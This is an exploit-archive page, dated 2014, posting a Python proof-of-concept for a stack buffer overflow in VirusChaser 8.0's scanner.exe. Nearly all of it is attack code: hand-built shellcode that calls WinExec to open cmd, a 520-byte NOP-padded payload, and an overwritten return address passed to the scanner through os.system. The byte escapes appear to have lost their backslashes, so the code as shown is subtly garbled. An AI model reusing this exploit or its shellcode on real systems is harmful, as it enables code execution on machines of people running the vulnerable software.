Home / exploitsPDF  

VirusChaser 8.0 Buffer Overflow

Posted on 27 March 2014

# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow # Date: 2014/03/26 # Exploit Author: wh1ant # Vendor Homepage: https://www.viruschaser.com/ # Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip # Version: 8.0 # Tested on: Windows 7 ultimate K # # You must have administrator permission to run from struct import pack import os shellcode = "x66x83xc4x10" # add esp, 0x10 shellcode += "xb8x50x70x50x50" # mov eax, 0x50507050 shellcode += "xb9x4ex7dx04x27" # mov ecx, 0x27047d4e shellcode += "x03xc1" # add eax, ecx ; WinExec() address shellcode += "x68x63x6dx64x01" # push 0x01646D63 shellcode += "x66xb9x50x50" # add cx, 0x5050 shellcode += "x66x81xc1xb0xaf" # add cx, 0xafb0 shellcode += "x88x4cx24x03" # mov [esp+3], cl shellcode += "x8bxd4" # mov edx, esp shellcode += "x66x51" # push cx shellcode += "x41" # inc cx shellcode += "x66x51" # push cx shellcode += "x52" # push edx shellcode += "x50" # push eax shellcode += "x50" # push eax shellcode += "xc3x90" # retn ; WinExec() # BOF retn: 0x0040753d pay = shellcode pay = pay.rjust(520, "x90") pay += "x9cxdbx12" os.system("C:\"Program Files\VirusChaser\scanner.exe" "" + pay + """)

 

TOP